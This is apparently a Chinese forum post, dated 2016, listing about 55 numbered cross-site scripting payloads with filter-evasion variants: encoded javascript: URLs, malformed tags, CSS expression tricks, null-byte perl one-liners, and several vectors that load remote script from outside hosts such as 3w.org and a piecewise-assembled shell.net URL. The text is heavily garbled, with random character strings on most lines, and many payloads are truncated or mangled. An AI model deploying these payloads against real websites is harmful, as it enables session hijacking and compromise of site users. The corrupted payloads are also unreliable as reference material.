(1)普通的XSS JavaScript注入- E$ M5 m0 E5 \3 s
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) m% g/ p$ I( F7 S0 ? u
(99)另类弹框0 q6 B5 i8 E* K1 c0 P# S1 S0 ?
<q/oncut=alert()>1* C2 h7 J" G/ P
<s/onclick=alert()>b
/ c9 z& m! [; p F% N! j <XSS=" onclick="alert(1)//">clickme</SSX=">' b# O9 q! g7 L" `" {% ?4 e7 d
<zzz onclick=alert`1`>clickme</zzz> 5 c# g( b/ S, s& p( I
<a onclick=alert`1`>clickme</a>9 o& r0 z, X# n( B0 |) S
<a=">clickme</a=">
. d, [" B) [% z7 [8 J<a=">clickme</a>
/ n, g! \. M0 b y<z=">clickme</z=">
- _9 X. \/ u3 |# ^: \+ ^<z onclick=alert`1`>clickme</z>1 h5 ~: U! F4 z! o4 h
" O* j/ n3 D$ R) p# d7 ~& a
(2)IMG标签XSS使用JavaScript命令# Q, F( a% {; J- W
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
V, z7 m' x/ ?0 C! {7 P- d4 d
0 V& m9 I2 W% \% p6 b- |7 J5 S. n(3)IMG标签无分号无引号/ ~3 P- z/ U; C
<IMG SRC=javascript:alert(‘XSS’)>* S0 J' c1 g# W: z% |2 g( S
# E" Y' x5 N* p. O. b2 K9 ^(4)IMG标签大小写不敏感
7 }" l. x4 D% Y<IMG SRC=JaVaScRiPt:alert(‘XSS’)>- l. o) |! ~. b( u5 g- {, T; s
% }/ x2 P4 Q9 l* a8 k6 ]7 F+ P(5)HTML编码(必须有分号)
/ x4 d5 l' g, q4 F U8 S<IMG SRC=javascript:alert(“XSS”)>0 x* ?' U+ k/ @9 e8 U$ `& {
" Y( k- a( n$ j2 V! {0 N- J(6)修正缺陷IMG标签
) F. }9 v% s/ R$ y3 F( s W0 P<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
; l. l, _/ U# \8 z/ j1 p0 p v/ x& E, ]( W7 O$ M) o! m
(7)formCharCode标签(计算器)8 B& L& v% \" F
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
0 ]7 H/ p" n8 d( A' X; Q, T7 e- l& G3 V) `) g
(8)UTF-8的Unicode编码(计算器)
. k `/ w4 H T0 x7 k' {<IMG SRC=jav..省略..S')>
/ |, X" m5 V$ ^/ f, ]" l! O
8 E9 P+ E" b% W) D) M7 n(9)7位的UTF-8的Unicode编码是没有分号的(计算器)' O& j! h) O9 K) S# r$ m- S
<IMG SRC=jav..省略..S')>
8 X4 z3 [, |- j0 J: p" Z$ V
3 a% n- P: i) ]4 Y! r$ n(10)十六进制编码也是没有分号(计算器)
% L7 o; R7 [# z/ S4 Z<IMG SRC=\'#\'" /span>0 q" L4 D& A* e4 C9 e, g0 p
( i/ u3 B2 S) ^, }
(11)嵌入式标签,将Javascript分开
/ T! h4 ^* k( b7 g: H' K1 |<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>! ^9 S2 n, z* a* L& R5 F- L, b- T
{( x4 q2 \& M; H* f4 F- }! E/ [: r
(12)嵌入式编码标签,将Javascript分开
( k/ c( U- ~; i9 o; Q<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>, E" }- n8 c/ y3 c4 \6 j
8 r# ~9 Q% \' V! x# A(13)嵌入式换行符; l) P/ ^& F* ^4 n$ N( E
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
" ^" v8 |2 |6 k/ W+ V! b/ B
! t v6 {* p3 K% g2 E(14)嵌入式回车
! [% g6 u: {! V' i+ V<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
9 i. J" {# P* g, c$ W
/ \$ X# @8 Q: \, X& q s(15)嵌入式多行注入JavaScript,这是XSS极端的例子2 A! A. Q `" z- p6 g r
<IMG SRC=\'#\'" /span>
8 a% D& [7 G4 K4 `+ j
3 L6 L" @ b- U, b! g% ]" y- q(16)解决限制字符(要求同页面): J) k8 [0 `7 [$ o( h9 y
<script>z=’document.’</script>
: @% F6 Z U _* s) g/ D1 z<script>z=z+’write(“‘</script>% ^- ?0 d1 ]3 Q' y* O
<script>z=z+’<script’</script>; }7 Z- `; \! b
<script>z=z+’ src=ht’</script>1 q6 d+ X/ A [! V/ @9 t
<script>z=z+’tp://ww’</script>9 p$ o- j8 Q' Y
<script>z=z+’w.shell’</script>
: Z7 L; S' D5 U# ^" D<script>z=z+’.net/1.’</script>
( O: M- F# a3 H! ?5 m- {# f<script>z=z+’js></sc’</script>
0 x9 u8 o- `& G/ I( J<script>z=z+’ript>”)’</script>
" L" q' a; r4 k2 w6 y; S# Y" {<script>eval_r(z)</script>
5 S& l; M$ ?( d, v5 U) ]: m0 V! z; i& c6 `+ j/ A
(17)空字符
) x5 B. Z$ H" xperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out, f V2 q8 }8 a" L" p- i
* r$ k. b! ?( t3 h" H+ A(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用% @. g) B' O8 D" ^ n4 X
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
/ c6 m( e" J [. H
" x2 f' s B* T6 d% m(19)Spaces和meta前的IMG标签8 H" G( S! F( e
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
Y5 @5 U: N8 z& R! z2 B# ?
) D* b( {! w ^3 P(20)Non-alpha-non-digit XSS
6 a8 K( `# s* ]9 Y<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>2 V, H% d* X% ^) K& U/ I' b
( }' m8 [9 L$ X, l6 q% w$ E(21)Non-alpha-non-digit XSS to 2
2 i6 f3 T- X1 K- _( z<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>' j+ N( N9 w- c( g, V# {# D1 `
! |, }4 t7 A9 d: B5 q$ J(22)Non-alpha-non-digit XSS to 3
. H, {3 q3 i3 x<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
9 f3 M$ R4 l* @4 O, }
0 L v' q. r$ l9 r(23)双开括号
4 D: u1 G0 H2 O2 d1 ?: Q8 A<<SCRIPT>alert(“XSS”);//<</SCRIPT>
6 e6 I6 R! j1 g2 U
% I, d% y) x' I(24)无结束脚本标记(仅火狐等浏览器)* R8 x9 f' z2 I9 P# w/ u
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>4 g* u/ k/ i L+ _, S/ E
# Y/ l: P5 w/ }! }/ x( W7 z! R; R
(25)无结束脚本标记21 x4 |* h* r8 F- c7 s
<SCRIPT SRC=//3w.org/XSS/xss.js>+ [* d9 B. U# n, M3 I* q
R( V6 _3 C5 u(26)半开的HTML/JavaScript XSS; e, E+ E0 _& W9 n9 p8 o
<IMG SRC=\'#\'" /span>
/ G+ X/ g U5 q% j. x' P
/ v1 e+ B$ K$ m, {# U7 L' r; n(27)双开角括号
- S$ }: r1 a' l+ i& \: Y9 X<iframe src=http://3w.org/XSS.html <+ n6 |" P( ?9 F: L' t
& |: p' N/ P( J( ^/ F2 t5 N, u(28)无单引号 双引号 分号7 E7 W& t9 o7 A: d( C
<SCRIPT>a=/XSS/; g; k& Z( }, ?7 l; x
alert(a.source)</SCRIPT>
6 _3 c. {' {- x1 n; a" Z F# L
4 p" E1 A+ A5 o( j2 `(29)换码过滤的JavaScript
/ f8 N2 w& ]1 ]8 m/ h\”;alert(‘XSS’);//
$ v) x8 c0 H B: Y D( Q. [
1 u% h2 ] [: y! g: n0 S0 `: }7 f(30)结束Title标签
% P( {% K9 e# ]. P</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
0 j0 s! Z# n; C/ {5 G! ?+ i1 o2 ^8 \- P& b( F/ [3 u
(31)Input Image
" Q: D" L+ T: W% |& X<INPUT SRC=\'#\'" /span>
, u: {9 V. [) k( }) P8 W( M4 u+ @8 Y, @
(32)BODY Image l M9 ?$ l$ N! A
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ f1 R% k4 D T% ^" z5 K5 y% Q6 g! a, g4 ], a
(33)BODY标签
, s" c2 U, A; j3 A! Q<BODY(‘XSS’)>7 v( p6 E1 _( E2 D s" h# C7 C# y
# V: i+ {- n+ X
(34)IMG Dynsrc7 D6 l; ~4 Y g. {* K. L
<IMG DYNSRC=\'#\'" /span>9 F# R# S5 m6 t6 [ X0 ?/ [ q
) j4 f! v1 j: h7 B9 s(35)IMG Lowsrc
& \" Z+ j Z9 z( @+ _<IMG LOWSRC=\'#\'" /span>
' `9 [% I8 |: F$ j6 G( z8 e
9 x; y1 D U9 s. H(36)BGSOUND
1 P. {4 O. }3 {' u5 T<BGSOUND SRC=\'#\'" /span>) \8 E }3 @% p+ n
]5 c, J. F) T4 J/ {8 B% g) @
(37)STYLE sheet) N8 }0 Z" l2 a! N8 ~. y" D3 D( i
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
[) e( G7 F! R! W6 z. H' q+ ]
, }* P/ p# O/ x% u(38)远程样式表9 m% N6 p: b1 I) Y: o
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>8 G+ x( [# e, T) U' k7 Q
7 a' q; G& n, L; o(39)List-style-image(列表式)$ m! N& v! z8 r3 \6 G2 E! _* R
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS: O* X" p9 H b1 q6 F% a5 O% f6 F5 u
5 B3 `% w/ f4 X0 ^# l
(40)IMG VBscript
- R, x6 H. y1 P8 S. C1 v% n" I: k<IMG SRC=\'#\'" /STYLE><UL><LI>XSS6 V5 \) k% G% [
! Y2 R0 |# S" T& W I% z- T8 E
(41)META链接url7 v; A* _$ Z: w- l
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”># W# E, h, J) ]8 |, t& J& J p
4 ^8 ^- I* V1 z! G3 s
(42)Iframe9 Y3 y6 Z. P* k
<IFRAME SRC=\'#\'" /IFRAME>
5 y% q" M! `+ l. m, |$ a/ O
p; i9 v" ]: j) K- T3 w( \(43)Frame; n) `. \+ Z0 {1 B
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>3 _% j- @! h- H$ A' f2 G
* z$ o7 `2 i0 x3 I+ B
(44)Table# V( n. h0 ^6 e/ r2 q0 A6 P, Z
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
* E8 u& T. w3 r/ o: s: `$ q6 ~1 O9 ]. c$ [
(45)TD! Q) c1 M" L q; r) O. o
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
# t. _) S2 I j. Y* G! \; I$ Q- e2 T9 w. {) S5 w7 {
(46)DIV background-image% g: k" L( A# f
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
4 `1 }: |, N) d5 Q5 N) T8 s
% i. P; {2 a& N0 R; k5 i1 E(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
, I* w* ]: b. N<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>( U C: _: B8 n8 o7 [" w( o* n* |) {
2 L2 {" M0 X+ E D$ _- o6 b# q" ]% y
(48)DIV expression
" H# q1 [* R3 q1 X<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
' Y5 R1 i/ i3 N- h1 S' Q/ e, `7 L; ]0 d$ J0 ~. O
(49)STYLE属性分拆表达
. H; U9 k/ k6 L p: w<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
3 O" F% r. \6 j8 m1 f, U+ Q9 L* c" ^. y" i
(50)匿名STYLE(组成:开角号和一个字母开头)8 `+ p7 p- D6 W4 G4 j0 c
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>! U8 V2 s0 i+ g8 p
, s- ~$ @! V+ M) u; a
(51)STYLE background-image7 q q( O0 E: ^3 t! _" u5 q% N
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
+ k. k7 r% f V9 l9 w) l: c% L) O9 F; P M' ^6 k4 x
(52)IMG STYLE方式# I2 ` M+ _ @! K4 k
exppression(alert(“XSS”))’>
% G9 \ V2 C$ S/ E
* ~% u7 h1 P4 D2 h# R( w(53)STYLE background- P5 B: R& e" K u
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>/ z2 ~) y$ N, _$ o$ J
5 R# @& D% D& Q(54)BASE$ @( f, M; H* Y. }8 ~
<BASE HREF=”javascript:alert(‘XSS’);//”>
. f% r1 U% k' C; L: r0 ?& d
" N1 Q* R1 @( b- X; s, q& |& u(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
3 \# ?# M( L3 z( Q3 J; X<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>& L, i3 Y: O# l, L% ]
|
发表于 2016-4-28 10:06:15
收藏
支持
反对